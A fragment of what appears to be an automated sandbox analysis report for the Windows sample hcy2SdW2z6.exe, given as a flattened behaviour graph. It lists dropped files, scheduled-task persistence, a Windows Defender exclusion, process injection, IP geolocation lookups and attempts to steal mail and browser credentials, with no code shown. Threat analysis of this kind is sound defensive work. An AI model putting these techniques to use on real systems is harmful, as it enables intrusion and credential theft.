            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634875 Sample: hcy2SdW2z6.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 49 reallyfreegeoip.org 2->49 51 checkip.dyndns.org 2->51 53 checkip.dyndns.com 2->53 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 Antivirus / Scanner detection for submitted sample 2->71 75 9 other signatures 2->75 8 hcy2SdW2z6.exe 7 2->8         started        12 zZlsXaceOG.exe 2->12         started        14 svchost.exe 1 1 2->14         started        signatures3 73 Tries to detect the country of the analysis system (by using the IP) 49->73 process4 dnsIp5 41 C:\Users\user\AppData\...\zZlsXaceOG.exe, PE32 8->41 dropped 43 C:\Users\...\zZlsXaceOG.exe:Zone.Identifier, ASCII 8->43 dropped 45 C:\Users\user\AppData\Local\...\tmpDE83.tmp, XML 8->45 dropped 47 C:\Users\user\AppData\...\hcy2SdW2z6.exe.log, ASCII 8->47 dropped 77 Uses schtasks.exe or at.exe to add and modify task schedules 8->77 79 Adds a directory exclusion to Windows Defender 8->79 81 Injects a PE file into a foreign processes 8->81 17 powershell.exe 23 8->17         started        20 hcy2SdW2z6.exe 15 2 8->20         started        23 powershell.exe 22 8->23         started        25 schtasks.exe 1 8->25         started        83 Antivirus detection for dropped file 12->83 85 Multi AV Scanner detection for dropped file 12->85 27 zZlsXaceOG.exe 12->27         started        29 schtasks.exe 12->29         started        59 127.0.0.1 unknown unknown 14->59 file6 signatures7 process8 dnsIp9 61 Loading BitLocker PowerShell Module 17->61 31 conhost.exe 17->31         started        33 WmiPrvSE.exe 17->33         started        55 checkip.dyndns.com 193.122.6.168, 49710, 49715, 49719 ORACLE-BMC-31898US United States 20->55 57 reallyfreegeoip.org 104.21.96.1, 443, 49713, 49717 CLOUDFLARENETUS United States 20->57 35 conhost.exe 23->35         started        37 conhost.exe 25->37         started        63 Tries to steal Mail credentials (via file / registry access) 27->63 65 Tries to harvest and steal browser information (history, passwords, etc) 27->65 39 conhost.exe 29->39         started        signatures10 process11

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.